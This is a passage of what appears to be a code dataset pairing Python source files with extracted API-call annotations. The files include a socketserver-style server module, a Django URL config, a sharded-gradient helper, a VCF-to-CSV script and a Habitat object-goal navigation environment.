# children.
try:
pid, status = os.waitpid(0, 0)
except OSError:
pid = None
if pid not in self.active_children: continue
self.active_children.remove(pid)
# XXX: This loop runs more system calls than it ought
# to. There should be a way to put the active_children into a
# process group and then use os.waitpid(-pgid) to wait for any
# of that set, but I couldn't find a way to allocate pgids
# that couldn't collide.
for child in self.active_children:
try:
pid, status = os.waitpid(child, os.WNOHANG)
except OSError:
pid = None
if not pid: continue
try:
self.active_children.remove(pid)
except ValueError as e:
raise ValueError('%s. x=%d and list=%r' % (e.message, pid,
self.active_children))
def handle_timeout(self):
"""Wait for zombies after self.timeout seconds of inactivity.
May be extended, do not override.
"""
self.collect_children()
def service_actions(self):
"""Collect the zombie child processes regularly in the ForkingMixIn.
service_actions is called in the BaseServer's serve_forver loop.
"""
self.collect_children()
def process_request(self, request, client_address):
"""Fork a new subprocess to process the request."""
pid = os.fork()
if pid:
# Parent process
if self.active_children is None:
self.active_children = []
self.active_children.append(pid)
self.close_request(request)
return
else:
# Child process.
# This must never return, hence os._exit()!
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
os._exit(0)
except:
try:
self.handle_error(request, client_address)
self.shutdown_request(request)
finally:
os._exit(1)
class ThreadingMixIn:
"""Mix-in class to handle each request in a new thread."""
# Decides how threads will act upon termination of the
# main process
daemon_threads = False
def process_request_thread(self, request, client_address):
"""Same as in BaseServer but as a thread.
In addition, exception handling is done here.
"""
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
def process_request(self, request, client_address):
"""Start a new thread to process the request."""
t = threading.Thread(target = self.process_request_thread,
args = (request, client_address))
t.daemon = self.daemon_threads
t.start()
class ForkingUDPServer(ForkingMixIn, UDPServer): pass
class ForkingTCPServer(ForkingMixIn, TCPServer): pass
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
class ThreadingTCPServer(ThreadingMixIn, TCPServer): pass
if hasattr(socket, 'AF_UNIX'):
class UnixStreamServer(TCPServer):
address_family = socket.AF_UNIX
class UnixDatagramServer(UDPServer):
address_family = socket.AF_UNIX
class ThreadingUnixStreamServer(ThreadingMixIn, UnixStreamServer): pass
class ThreadingUnixDatagramServer(ThreadingMixIn, UnixDatagramServer): pass
class BaseRequestHandler:
"""Base class for request handler classes.
This class is instantiated for each request to be handled. The
constructor sets the instance variables request, client_address
and server, and then calls the handle() method. To implement a
specific service, all you need to do is to derive a class which
defines a handle() method.
The handle() method can find the request as self.request, the
client address as self.client_address, and the server (in case it
needs access to per-server information) as self.server. Since a
separate instance is created for each request, the handle() method
can define arbitrary other instance variariables.
"""
def __init__(self, request, client_address, server):
self.request = request
self.client_address = client_address
self.server = server
self.setup()
try:
self.handle()
finally:
self.finish()
def setup(self):
pass
def handle(self):
pass
def finish(self):
pass
# The following two classes make it possible to use the same service
# class for stream or datagram servers.
# Each class sets up these instance variables:
# - rfile: a file object from which receives the request is read
# - wfile: a file object to which the reply is written
# When the handle() method returns, wfile is flushed properly
class StreamRequestHandler(BaseRequestHandler):
"""Define self.rfile and self.wfile for stream sockets."""
# Default buffer sizes for rfile, wfile.
# We default rfile to buffered because otherwise it could be
# really slow for large data (a getc() call per byte); we make
# wfile unbuffered because (a) often after a write() we want to
# read and we need to flush the line; (b) big writes to unbuffered
# files are typically optimized by stdio even when big reads
# aren't.
rbufsize = -1
wbufsize = 0
# A timeout to apply to the request socket, if not None.
timeout = None
# Disable nagle algorithm for this socket, if True.
# Use only when wbufsize != 0, to avoid small packets.
disable_nagle_algorithm = False
def setup(self):
self.connection = self.request
if self.timeout is not None:
self.connection.settimeout(self.timeout)
if self.disable_nagle_algorithm:
self.connection.setsockopt(socket.IPPROTO_TCP,
socket.TCP_NODELAY, True)
self.rfile = self.connection.makefile('rb', self.rbufsize)
self.wfile = self.connection.makefile('wb', self.wbufsize)
def finish(self):
if not self.wfile.closed:
try:
self.wfile.flush()
except socket.error:
# An final socket error may have occurred here, such as
# the local error ECONNABORTED.
pass
self.wfile.close()
self.rfile.close()
class DatagramRequestHandler(BaseRequestHandler):
# XXX Regrettably, I cannot get this working on Linux;
# s.recvfrom() doesn't return a meaningful client address.
"""Define self.rfile and self.wfile for datagram sockets."""
def setup(self):
from io import BytesIO
self.packet, self.socket = self.request
self.rfile = BytesIO(self.packet)
self.wfile = BytesIO()
def finish(self):
self.socket.sendto(self.wfile.getvalue(), self.client_address)
| [
"dummy_threading.Thread",
"socket.socket",
"os.waitpid",
"io.BytesIO",
"os._exit",
"dummy_threading.Event",
"os.fork",
"traceback.print_exc",
"time.time"
] | [((7416, 7433), 'dummy_threading.Event', 'threading.Event', ([], {}), '()\n', (7431, 7433), True, 'import dummy_threading as threading\n'), ((13072, 13093), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (13091, 13093), False, 'import traceback\n'), ((14642, 14694), 'socket.socket', 'socket.socket', (['self.address_family', 'self.socket_type'], {}), '(self.address_family, self.socket_type)\n', (14655, 14694), False, 'import socket\n'), ((19078, 19087), 'os.fork', 'os.fork', ([], {}), '()\n', (19085, 19087), False, 'import os\n'), ((20516, 20604), 'dummy_threading.Thread', 'threading.Thread', ([], {'target': 'self.process_request_thread', 'args': '(request, client_address)'}), '(target=self.process_request_thread, args=(request,\n client_address))\n', (20532, 20604), True, 'import dummy_threading as threading\n'), ((24630, 24650), 'io.BytesIO', 'BytesIO', (['self.packet'], {}), '(self.packet)\n', (24637, 24650), False, 'from io import BytesIO\n'), ((24672, 24681), 'io.BytesIO', 'BytesIO', ([], {}), '()\n', (24679, 24681), False, 'from io import BytesIO\n'), ((10251, 10257), 'time.time', 'time', ([], {}), '()\n', (10255, 10257), True, 'from time import time as time\n'), ((17587, 17603), 'os.waitpid', 'os.waitpid', (['(0)', '(0)'], {}), '(0, 0)\n', (17597, 17603), False, 'import os\n'), ((18155, 18184), 'os.waitpid', 'os.waitpid', (['child', 'os.WNOHANG'], {}), '(child, os.WNOHANG)\n', (18165, 18184), False, 'import os\n'), ((19564, 19575), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\n', (19572, 19575), False, 'import os\n'), ((19776, 19787), 'os._exit', 'os._exit', (['(1)'], {}), '(1)\n', (19784, 19787), False, 'import os\n'), ((10778, 10784), 'time.time', 'time', ([], {}), '()\n', (10782, 10784), True, 'from time import time as time\n')] |
#!/usr/bin/env python
# coding=utf-8
from django.conf.urls import patterns, url
from ma import views
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'cat.views.home', name='home'),
# url(r'^cat/', include('cat.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
# url(r'^admin/', include(admin.site.urls)),
url(r'^home/$', views.home),
url(r'^pwd/$', views.pwd),
url(r'^user/add', views.userAdd),
url(r'^userTypes/', views.userTypes),
url(r'^login/', views.login),
url(r'^menu/', views.menu),
)
| [
"django.conf.urls.url"
] | [((600, 626), 'django.conf.urls.url', 'url', (['"""^home/$"""', 'views.home'], {}), "('^home/$', views.home)\n", (603, 626), False, 'from django.conf.urls import patterns, url\n'), ((633, 657), 'django.conf.urls.url', 'url', (['"""^pwd/$"""', 'views.pwd'], {}), "('^pwd/$', views.pwd)\n", (636, 657), False, 'from django.conf.urls import patterns, url\n'), ((664, 695), 'django.conf.urls.url', 'url', (['"""^user/add"""', 'views.userAdd'], {}), "('^user/add', views.userAdd)\n", (667, 695), False, 'from django.conf.urls import patterns, url\n'), ((702, 737), 'django.conf.urls.url', 'url', (['"""^userTypes/"""', 'views.userTypes'], {}), "('^userTypes/', views.userTypes)\n", (705, 737), False, 'from django.conf.urls import patterns, url\n'), ((744, 771), 'django.conf.urls.url', 'url', (['"""^login/"""', 'views.login'], {}), "('^login/', views.login)\n", (747, 771), False, 'from django.conf.urls import patterns, url\n'), ((778, 803), 'django.conf.urls.url', 'url', (['"""^menu/"""', 'views.menu'], {}), "('^menu/', views.menu)\n", (781, 803), False, 'from django.conf.urls import patterns, url\n')] |
from typing import Optional
import torch
import torch.nn as nn
from torch.nn.parameter import Parameter
class ShardedGradient:
def __init__(self,
param: Parameter,
sharded_module: nn.Module,
offload_config: Optional[dict] = None
) -> None:
assert hasattr(
param, 'ca_attr') and param.ca_attr.is_sharded, 'ShardedGradient can only be initialized with sharded parameter'
self.param = param
self.sharded_module = sharded_module
self.offload_config = offload_config
self._cpu_offload = offload_config.get('device', None) == 'cpu' if offload_config else False
# _gpu_grad is either sharded or not
# all saved grads are fp32
self._gpu_grad: Optional[torch.Tensor] = None
self._cpu_grad: Optional[torch.Tensor] = None
if self._cpu_offload:
# this buffer will be held and reused every iteration
self._cpu_grad = torch.zeros(param.ca_attr.payload('cpu'), dtype=torch.float).pin_memory()
@torch.no_grad()
def setup(self) -> None:
"""This function will be called pre-backward. Save the local accumulated gradient to _gpu_grad.
When no_sync() is enable (_require_backward_grad_sync=False), the grad is accumulated locally in param.grad
:raises AssertionError: Raise if grad shape is wrong
"""
if self.sharded_module._require_backward_grad_sync and self.param.grad is not None:
if self.param.grad.device != self.param.data.device:
# TODO: offload?
raise RuntimeError(
'grad and param are on different device, grad {self.param.grad.device} vs. param {self.param.data.device}')
else:
self._gpu_grad = self.param.grad.data
self.param.grad = None
def reduce_scatter_callback(self, reduced_grad: torch.Tensor) -> None:
"""This function will be called in post-backward hook, so we cannot modify param.grad directly
:param reduced_grad: the reduced grad
:type reduced_grad: torch.Tensor
"""
# Make sure we store fp32 grad
if torch.is_floating_point(reduced_grad) and reduced_grad.dtype != torch.float:
reduced_grad.data = reduced_grad.data.to(torch.float)
if self._gpu_grad is None:
self._gpu_grad = reduced_grad.data
else:
self._gpu_grad += reduced_grad.data
# Optionally move gradients to CPU, typically used if one is running the optimizer on the CPU. Once the full
# backwards pass completes, we will set `.grad` to the CPU copy.
if self._cpu_offload:
self._cpu_grad.copy_(self._gpu_grad.data, non_blocking=True)
# Don't let this memory get reused until after the transfer.
self._gpu_grad.data.record_stream(torch.cuda.current_stream())
@torch.no_grad()
def write_back(self) -> None:
"""This function will be called in final backward hook
"""
if self._cpu_grad is not None:
assert self.param.device == torch.device(
'cpu'), f'Incorrect param device, expected CPU, got {self.param.device}'
self.param.grad.data = self._cpu_grad
elif self._gpu_grad is not None:
assert self.param.device == self._gpu_grad.device, f'Incorrect _gpu_grad device, param on {self.param.device} but _gpu_grad on {self._gpu_grad.device}'
self.param.grad.data = self._gpu_grad
else:
raise RuntimeError('No grad to write back')
# If using CPU offload, _cpu_grad will store the CPU tensor of _gpu_grad
# They should be released here
self._gpu_grad = None
| [
"torch.is_floating_point",
"torch.no_grad",
"torch.cuda.current_stream",
"torch.device"
] | [((1079, 1094), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1092, 1094), False, 'import torch\n'), ((2944, 2959), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2957, 2959), False, 'import torch\n'), ((2208, 2245), 'torch.is_floating_point', 'torch.is_floating_point', (['reduced_grad'], {}), '(reduced_grad)\n', (2231, 2245), False, 'import torch\n'), ((2909, 2936), 'torch.cuda.current_stream', 'torch.cuda.current_stream', ([], {}), '()\n', (2934, 2936), False, 'import torch\n'), ((3148, 3167), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (3160, 3167), False, 'import torch\n')] |
#!/usr/bin/env python3
import argparse
import csv
from typing import List
from cyvcf2 import VCF
def main():
args = parse_arguments()
# load all variants
variants = []
with open(args.inputs) as f:
reader = csv.DictReader(f)
for row in reader:
variants += get_records(
vcf_path=row["file"],
sample_name=row["name"],
group=row["group"],
no_alt=args.no_alt,
autosomes_only=args.autosomes_only,
)
# write csv
columns = ["sample", "group", "chrom", "pos", "ref", "alt"]
with open(args.output, "w") as f:
writer = csv.DictWriter(f, fieldnames=columns)
writer.writeheader()
writer.writerows(variants)
def get_records(
vcf_path: str,
sample_name: str,
group: str,
no_alt: bool = False,
autosomes_only: bool = True,
) -> List[dict]:
"""
Load records from VCF and create a list of dictionaries with their relevant info
"""
hs_autosomes = [str(x) for x in range(1, 23)]
hs_standard = hs_autosomes + ["X", "Y"]
records = []
for variant in VCF(vcf_path):
chrom_ncbi = variant.CHROM.replace("chr", "")
if (no_alt and chrom_ncbi not in hs_standard) or (
autosomes_only and chrom_ncbi not in hs_autosomes
):
continue
record = {
"sample": sample_name,
"group": group,
"chrom": variant.CHROM,
"pos": variant.POS,
"ref": variant.REF,
"alt": variant.ALT[0],
}
records.append(record)
return records
def parse_arguments():
parser = argparse.ArgumentParser(
description="Reads a set of VCF files and creates list with the variants"
)
parser.add_argument(
"--inputs",
"-i",
required=True,
help="list containing VCF files to be processed (CSV file with columns name,group,file)",
)
parser.add_argument(
"--no-alt",
"-n",
action="store_true",
help="ignore variant from alternate sequences",
dest="no_alt",
)
parser.add_argument(
"--autosomes-only",
"-a",
action="store_true",
help="keep only variatns from autosomes (1-22), implies --no-alt",
dest="autosomes_only",
)
parser.add_argument("--output", "-o", required=True, help="output CSV file")
return parser.parse_args()
if __name__ == "__main__":
main()
| [
"csv.DictWriter",
"cyvcf2.VCF",
"csv.DictReader",
"argparse.ArgumentParser"
] | [((1155, 1168), 'cyvcf2.VCF', 'VCF', (['vcf_path'], {}), '(vcf_path)\n', (1158, 1168), False, 'from cyvcf2 import VCF\n'), ((1695, 1798), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Reads a set of VCF files and creates list with the variants"""'}), "(description=\n 'Reads a set of VCF files and creates list with the variants')\n", (1718, 1798), False, 'import argparse\n'), ((234, 251), 'csv.DictReader', 'csv.DictReader', (['f'], {}), '(f)\n', (248, 251), False, 'import csv\n'), ((669, 706), 'csv.DictWriter', 'csv.DictWriter', (['f'], {'fieldnames': 'columns'}), '(f, fieldnames=columns)\n', (683, 706), False, 'import csv\n')] |
import json
import bz2
import gzip
import _pickle as cPickle
import gym
import numpy as np
import quaternion
import skimage.morphology
import habitat
from envs.utils.fmm_planner import FMMPlanner
from constants import coco_categories
import envs.utils.pose as pu
class ObjectGoal_Env(habitat.RLEnv):
"""The Object Goal Navigation environment class. The class is responsible
for loading the dataset, generating episodes, and computing evaluation
metrics.
"""
def __init__(self, args, rank, config_env, dataset):
self.args = args
self.rank = rank
super().__init__(config_env, dataset)
# Loading dataset info file
self.split = config_env.DATASET.SPLIT
self.episodes_dir = config_env.DATASET.EPISODES_DIR.format(
split=self.split)
if args.custom_eps:
with open("{}/train_episode_data.json".format(args.custom_eps), 'r') as f:
episodes_all = json.load(f)
self.episodes_all = {}
for ep in episodes_all:
if ep["scene"] in self.episodes_all:
self.episodes_all[ep["scene"]].append(ep)
else:
self.episodes_all[ep["scene"]] = [ep]
dataset_info_file = self.episodes_dir + \
"{split}_info.pbz2".format(split=self.split)
with bz2.BZ2File(dataset_info_file, 'rb') as f:
self.dataset_info = cPickle.load(f)
# Specifying action and observation space
self.action_space = gym.spaces.Discrete(3)
self.observation_space = gym.spaces.Box(0, 255,
(3, args.frame_height,
args.frame_width),
dtype='uint8')
# Initializations
self.episode_no = 0
# Scene info
self.last_scene_path = None
self.scene_path = None
self.scene_name = None
# Episode Dataset info
self.eps_data = None
self.eps_data_idx = None
self.gen_ep_idx = 1
self.gt_planner = None
self.object_boundary = None
self.goal_idx = None
self.goal_name = None
self.map_obj_origin = None
self.starting_loc = None
self.starting_distance = None
if args.eval and args.shuffle:
self.shuffled_indices = np.arange(args.num_eval_episodes)
np.random.shuffle(self.shuffled_indices)
# Episode tracking info
self.curr_distance = None
self.prev_distance = None
self.timestep = None
self.stopped = None
self.path_length = None
self.last_sim_location = None
self.trajectory_states = []
self.info = {}
self.info['distance_to_goal'] = None
self.info['spl'] = None
self.info['success'] = None
def load_new_episode(self):
"""The function loads a fixed episode from the episode dataset. This
function is used for evaluating a trained model on the val split.
"""
args = self.args
self.scene_path = self.habitat_env.sim.config.SCENE
scene_name = self.scene_path.split("/")[-1].split(".")[0]
if self.scene_path != self.last_scene_path:
if not args.testset:
episodes_file = self.episodes_dir + \
"content/{}_episodes.json.gz".format(scene_name)
print("Loading episodes from: {}".format(episodes_file))
with gzip.open(episodes_file, 'r') as f:
self.eps_data = json.loads(
f.read().decode('utf-8'))["episodes"]
else:
episodes_file = self.episodes_dir + \
"content/{}_test_episodes.json".format(scene_name)
print("Loading episodes from: {}".format(episodes_file))
with open(episodes_file, 'r') as f:
self.eps_data = json.load(f)
self.eps_data_idx = 0
self.last_scene_path = self.scene_path
# Load episode info
if self.args.shuffle:
episode = self.eps_data[self.shuffled_indices[self.eps_data_idx]]
else:
episode = self.eps_data[self.eps_data_idx]
self.info["episode_data"] = episode
self.eps_data_idx += 1
self.eps_data_idx = self.eps_data_idx % len(self.eps_data)
pos = episode["start_position"]
rot = quaternion.from_float_array(episode["start_rotation"])
goal_name = episode["object_category"]
goal_idx = episode["object_id"]
floor_idx = episode["floor_id"]
# Load scene info
scene_info = self.dataset_info[scene_name]
sem_map = scene_info[floor_idx]['sem_map']
map_obj_origin = scene_info[floor_idx]['origin']
# Setup ground truth planner
object_boundary = args.success_dist
map_resolution = args.map_resolution
selem = skimage.morphology.disk(2)
traversible = skimage.morphology.binary_dilation(
sem_map[0], selem) != True
traversible = 1 - traversible
planner = FMMPlanner(traversible)
selem = skimage.morphology.disk(
int(object_boundary * 100. / map_resolution))
goal_map = skimage.morphology.binary_dilation(
sem_map[goal_idx + 1], selem) != True
goal_map = 1 - goal_map
planner.set_multi_goal(goal_map)
# Get starting loc in GT map coordinates
x = -pos[2]
y = -pos[0]
min_x, min_y = map_obj_origin / 100.0
map_loc = int((-y - min_y) * 20.), int((-x - min_x) * 20.)
self.gt_planner = planner
self.starting_loc = map_loc
self.object_boundary = object_boundary
self.goal_idx = goal_idx
self.goal_name = goal_name
self.map_obj_origin = map_obj_origin
self.starting_distance = self.gt_planner.fmm_dist[self.starting_loc]\
/ 20.0 + self.object_boundary
self.info["episode_data"]["shortest_dist"] = self.starting_distance
self.prev_distance = self.starting_distance
self._env.sim.set_agent_state(pos, rot)
self.info["sim_pos"] = pos
self.info["sim_rot"] = rot
self.info["scene"] = scene_name
self.info["floor_idx"] = floor_idx
# The following two should match approximately
#print(self.starting_loc)
#print(self.sim_continuous_to_sim_map(self.get_sim_location()))
self.info['gt_pos'] = self.sim_continuous_to_sim_map(self.get_sim_location())
obs = self._env.sim.get_observations_at(pos, rot)
return obs
def load_incomplete_episode(self):
args = self.args
self.scene_path = self.habitat_env.sim.config.SCENE
scene_name = self.scene_path.split("/")[-1].split(".")[0]
if self.scene_path != self.last_scene_path:
print("Loading episodes from: {}".format(scene_name))
self.eps_data_idx = 0
self.last_scene_path = self.scene_path
episode = self.episodes_all[scene_name][self.eps_data_idx]
self.info["episode_data"] = episode
self.eps_data_idx += 1
self.eps_data_idx = self.eps_data_idx % len(self.episodes_all[scene_name])
pos = episode["sim_pos"]
rot = quaternion.from_rotation_vector(episode["sim_rot"])
goal_name = episode["goal_name"]
goal_idx = episode["goal_cat_id"]
floor_idx = episode["floor_idx"]
# Load scene info
scene_info = self.dataset_info[scene_name]
sem_map = scene_info[floor_idx]['sem_map']
map_obj_origin = scene_info[floor_idx]['origin']
# Setup ground truth planner
object_boundary = args.success_dist
map_resolution = args.map_resolution
selem = skimage.morphology.disk(2)
traversible = skimage.morphology.binary_dilation(
sem_map[0], selem) != True
traversible = 1 - traversible
planner = FMMPlanner(traversible)
selem = skimage.morphology.disk(
int(object_boundary * 100. / map_resolution))
goal_map = skimage.morphology.binary_dilation(
sem_map[goal_idx + 1], selem) != True
goal_map = 1 - goal_map
planner.set_multi_goal(goal_map)
# Get starting loc in GT map coordinates
x = -pos[2]
y = -pos[0]
min_x, min_y = map_obj_origin / 100.0
map_loc = int((-y - min_y) * 20.), int((-x - min_x) * 20.)
self.gt_planner = planner
self.starting_loc = map_loc
self.object_boundary = object_boundary
self.goal_idx = goal_idx
self.goal_name = goal_name
self.map_obj_origin = map_obj_origin
self.starting_distance = self.gt_planner.fmm_dist[self.starting_loc]\
/ 20.0 + self.object_boundary
self.info["episode_data"]["shortest_dist"] = self.starting_distance
self.prev_distance = self.starting_distance
self._env.sim.set_agent_state(pos, rot)
self.info["sim_pos"] = pos
self.info["sim_rot"] = rot
# The following two should match approximately
#print(self.starting_loc)
#print(self.sim_continuous_to_sim_map(self.get_sim_location()))
self.info['gt_pos'] = self.sim_continuous_to_sim_map(self.get_sim_location())
obs = self._env.sim.get_observations_at(pos, rot)
return obs
def generate_new_episode(self):
"""The function generates a random valid episode. This function is used
for training a model on the train split.
"""
args = self.args
self.scene_path = self.habitat_env.sim.config.SCENE
scene_name = self.scene_path.split("/")[-1].split(".")[0]
scene_info = self.dataset_info[scene_name]
map_resolution = args.map_resolution
floor_idx = np.random.randint(len(scene_info.keys()))
floor_height = scene_info[floor_idx]['floor_height']
sem_map = scene_info[floor_idx]['sem_map']
map_obj_origin = scene_info[floor_idx]['origin']
cat_counts = sem_map.sum(2).sum(1)
possible_cats = list(np.arange(6))
for i in range(6):
if cat_counts[i + 1] == 0:
possible_cats.remove(i)
object_boundary = args.success_dist
loc_found = False
while not loc_found:
if len(possible_cats) == 0:
print("No valid objects for {}".format(floor_height))
eps = eps - 1
continue
goal_idx = np.random.choice(possible_cats)
for key, value in coco_categories.items():
if value == goal_idx:
goal_name = key
selem = skimage.morphology.disk(2)
traversible = skimage.morphology.binary_dilation(
sem_map[0], selem) != True
traversible = 1 - traversible
planner = FMMPlanner(traversible)
selem = skimage.morphology.disk(
int(object_boundary * 100. / map_resolution))
goal_map = skimage.morphology.binary_dilation(
sem_map[goal_idx + 1], selem) != True
goal_map = 1 - goal_map
planner.set_multi_goal(goal_map)
m1 = sem_map[0] > 0
m2 = planner.fmm_dist > (args.min_d - object_boundary) * 20.0
m3 = planner.fmm_dist < (args.max_d - object_boundary) * 20.0
possible_starting_locs = np.logical_and(m1, m2)
possible_starting_locs = np.logical_and(
possible_starting_locs, m3) * 1.
if possible_starting_locs.sum() != 0:
loc_found = True
else:
print("Invalid object: {} / {} / {}".format(
scene_name, floor_height, goal_name))
possible_cats.remove(goal_idx)
scene_info[floor_idx]["sem_map"][goal_idx + 1, :, :] = 0.
self.dataset_info[scene_name][floor_idx][
"sem_map"][goal_idx + 1, :, :] = 0.
loc_found = False
while not loc_found:
pos = self._env.sim.sample_navigable_point()
x = -pos[2]
y = -pos[0]
min_x, min_y = map_obj_origin / 100.0
map_loc = int((-y - min_y) * 20.), int((-x - min_x) * 20.)
if abs(pos[1] - floor_height) < args.floor_thr / 100.0 and \
possible_starting_locs[map_loc[0], map_loc[1]] == 1:
loc_found = True
agent_state = self._env.sim.get_agent_state(0)
rotation = agent_state.rotation
rvec = quaternion.as_rotation_vector(rotation)
rvec[1] = np.random.rand() * 2 * np.pi
rot = quaternion.from_rotation_vector(rvec)
self.gt_planner = planner
self.starting_loc = map_loc
self.object_boundary = object_boundary
self.goal_idx = goal_idx
self.goal_name = goal_name
self.map_obj_origin = map_obj_origin
self.starting_distance = self.gt_planner.fmm_dist[self.starting_loc] \
/ 20.0 + self.object_boundary
self.prev_distance = self.starting_distance
self._env.sim.set_agent_state(pos, rot)
self.info["sim_pos"] = pos
self.info["sim_rot"] = quaternion.as_float_array(rot)
self.info["episode_id"] = self.gen_ep_idx
self.gen_ep_idx += 1
self.info["scene"] = scene_name
self.info["floor_idx"] = floor_idx
self.info["goal_name"] = goal_name
# The following two should match approximately
# print(starting_loc)
# print(self.sim_continuous_to_sim_map(self.get_sim_location()))
self.info['gt_pos'] = self.sim_continuous_to_sim_map(self.get_sim_location())
obs = self._env.sim.get_observations_at(pos, rot)
return obs
def sim_map_to_sim_continuous(self, coords):
"""Converts ground-truth 2D Map coordinates to absolute Habitat
simulator position and rotation.
"""
agent_state = self._env.sim.get_agent_state(0)
y, x = coords
min_x, min_y = self.map_obj_origin / 100.0
cont_x = x / 20. + min_x
cont_y = y / 20. + min_y
agent_state.position[0] = cont_y
agent_state.position[2] = cont_x
rotation = agent_state.rotation
rvec = quaternion.as_rotation_vector(rotation)
if self.args.train_single_eps:
rvec[1] = 0.0
else:
rvec[1] = np.random.rand() * 2 * np.pi
rot = quaternion.from_rotation_vector(rvec)
return agent_state.position, rot
def sim_continuous_to_sim_map(self, sim_loc):
"""Converts absolute Habitat simulator pose to ground-truth 2D Map
coordinates.
"""
x, y, o = sim_loc
min_x, min_y = self.map_obj_origin / 100.0
x, y = int((-x - min_x) * 20.), int((-y - min_y) * 20.)
o = np.rad2deg(o) + 180.0
return y, x, o
def reset(self):
"""Resets the environment to a new episode.
Returns:
obs (ndarray): RGBD observations (4 x H x W)
info (dict): contains timestep, pose, goal category and
evaluation metric info
"""
args = self.args
new_scene = self.episode_no % args.num_train_episodes == 0
self.episode_no += 1
# Initializations
self.timestep = 0
self.stopped = False
self.path_length = 1e-5
self.trajectory_states = []
if new_scene:
obs = super().reset()
self.scene_name = self.habitat_env.sim.config.SCENE
print("Changing scene: {}/{}".format(self.rank, self.scene_name))
self.scene_path = self.habitat_env.sim.config.SCENE
if args.gen_episode:
obs = self.generate_new_episode()
elif args.custom_eps:
obs = self.load_incomplete_episode()
elif self.split == "val":
obs = self.load_new_episode()
else:
obs = self.generate_new_episode()
rgb = obs['rgb'].astype(np.uint8)
depth = obs['depth']
state = np.concatenate((rgb, depth), axis=2).transpose(2, 0, 1)
self.last_sim_location = self.get_sim_location()
# Set info
self.info['time'] = self.timestep
self.info['sensor_pose'] = [0., 0., 0.]
self.info['goal_cat_id'] = self.goal_idx
self.info['goal_name'] = self.goal_name
return state, self.info
def step(self, action):
"""Function to take an action in the environment.
Args:
action (dict):
dict with following keys:
'action' (int): 0: stop, 1: forward, 2: left, 3: right
Returns:
obs (ndarray): RGBD observations (4 x H x W)
reward (float): amount of reward returned after previous action
done (bool): whether the episode has ended
info (dict): contains timestep, pose, goal category and
evaluation metric info
"""
action = action["action"]
if action == 0:
self.stopped = True
# Not sending stop to simulator, resetting manually
action = 3
obs, rew, done, _ = super().step(action)
# Get pose change
dx, dy, do = self.get_pose_change()
self.info['sensor_pose'] = [dx, dy, do]
self.path_length += pu.get_l2_distance(0, dx, 0, dy)
spl, success, dist = 0., 0., 0.
if done:
spl, success, dist = self.get_metrics()
self.info['distance_to_goal'] = dist
self.info['spl'] = spl
self.info['success'] = success
rgb = obs['rgb'].astype(np.uint8)
depth = obs['depth']
state = np.concatenate((rgb, depth), axis=2).transpose(2, 0, 1)
self.timestep += 1
self.info['time'] = self.timestep
return state, rew, done, self.info
def get_reward_range(self):
"""This function is not used, Habitat-RLEnv requires this function"""
return (0., 1.0)
def get_reward(self, observations):
curr_loc = self.sim_continuous_to_sim_map(self.get_sim_location())
self.curr_distance = self.gt_planner.fmm_dist[curr_loc[0],
curr_loc[1]] / 20.0
reward = (self.prev_distance - self.curr_distance) * \
self.args.reward_coeff
self.prev_distance = self.curr_distance
return reward
def get_metrics(self):
"""This function computes evaluation metrics for the Object Goal task
Returns:
spl (float): Success weighted by Path Length
(See https://arxiv.org/pdf/1807.06757.pdf)
success (int): 0: Failure, 1: Successful
dist (float): Distance to Success (DTS), distance of the agent
from the success threshold boundary in meters.
(See https://arxiv.org/pdf/2007.00643.pdf)
"""
curr_loc = self.sim_continuous_to_sim_map(self.get_sim_location())
dist = self.gt_planner.fmm_dist[curr_loc[0], curr_loc[1]] / 20.0
if dist == 0.0:
success = 1
else:
success = 0
spl = min(success * self.starting_distance / self.path_length, 1)
return spl, success, dist
def get_done(self, observations):
if self.info['time'] >= self.args.max_episode_length - 1:
done = True
elif self.stopped:
done = True
else:
done = False
return done
def get_info(self, observations):
"""This function is not used, Habitat-RLEnv requires this function"""
info = {}
return info
def get_spaces(self):
"""Returns observation and action spaces for the ObjectGoal task."""
return self.observation_space, self.action_space
def get_sim_location(self):
"""Returns x, y, o pose of the agent in the Habitat simulator."""
agent_state = super().habitat_env.sim.get_agent_state(0)
x = -agent_state.position[2]
y = -agent_state.position[0]
axis = quaternion.as_euler_angles(agent_state.rotation)[0]
if (axis % (2 * np.pi)) < 0.1 or (axis %
(2 * np.pi)) > 2 * np.pi - 0.1:
o = quaternion.as_euler_angles(agent_state.rotation)[1]
else:
o = 2 * np.pi - quaternion.as_euler_angles(agent_state.rotation)[1]
if o > np.pi:
o -= 2 * np.pi
return x, y, o
def get_pose_change(self):
"""Returns dx, dy, do pose change of the agent relative to the last
timestep."""
curr_sim_pose = self.get_sim_location()
dx, dy, do = pu.get_rel_pose_change(
curr_sim_pose, self.last_sim_location)
self.last_sim_location = curr_sim_pose
return dx, dy, do
| [
"quaternion.as_rotation_vector",
"quaternion.as_float_array",
"envs.utils.fmm_planner.FMMPlanner",
"numpy.random.rand",
"gzip.open",
"envs.utils.pose.get_l2_distance",
"numpy.arange",
"_pickle.load",
"bz2.BZ2File",
"numpy.concatenate",
"constants.coco_categories.items",
"numpy.rad2deg",
